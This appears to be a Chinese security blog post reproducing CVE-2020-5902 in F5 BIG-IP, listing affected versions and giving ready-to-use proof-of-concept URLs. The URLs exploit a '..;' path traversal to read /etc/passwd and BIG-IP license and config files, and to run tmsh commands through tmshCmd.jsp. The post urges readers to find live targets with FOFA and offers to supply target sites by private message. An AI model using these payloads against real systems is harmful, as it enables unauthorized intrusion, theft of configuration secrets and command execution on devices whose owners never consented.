CVE-2020-5902 BIG-IP 任意文件读取&RCE漏洞复现

admin

102620
文章

87
评论

2023年5月15日22:50:21评论26 views字数 840阅读2分48秒阅读模式

漏洞环境

FOFA搜索BIG-IP找资产，找不到目标站私信我。

漏洞危害

2020年07月03日通报的该漏洞，赶紧刷一波。攻击者通过向该页面发送特制的请求包，可以造成任意Java代码执行。进而控制 F5 BIG-IP 的全部功能，包括任意文件读取和系统命令执行等

影响范围

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0-14.1.2

BIG-IP 13.x: 13.1.0-13.1.3

BIG-IP 12.x: 12.1.0-12.1.5

BIG-IP 11.x: 11.6.1-11.6.5

漏洞复现

https://ip/tmui/login.jsp

CVE-2020-5902 BIG-IP 任意文件读取&RCE漏洞复现

任意文件读取漏洞:文末附POC

CVE-2020-5902 BIG-IP 任意文件读取&RCE漏洞复现

RCE漏洞:文末附POC

CVE-2020-5902 BIG-IP 任意文件读取&RCE漏洞复现

任意文件读取POC:

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

RCE漏洞POC:

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

原文始发于微信公众号（赛瑞攻防实验室）：CVE-2020-5902 BIG-IP 任意文件读取&RCE漏洞复现

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2020-5902 BIG-IP 任意文件读取&RCE漏洞复现

漏洞环境

漏洞危害

影响范围

漏洞复现

渗透测试|一次丝滑的渗透测试记录

2FA bypass 让我赚了 $______

实战解读：Llama 3 安全性对抗分析

记一次对抗中的钓鱼

深入剖析：如何使用Pulsar和Arthas高效排查消息队列延迟问题

【2024HW】|4-蓝队面试题

最新H1越权漏洞披露，获得15000美元奖励

某次小红书帮助下的Edu挖掘

实战 | 参数走私导致的权限绕过

观点 | 视频生成人工智能Sora的法律问题研究

发表评论

在线咨询

微信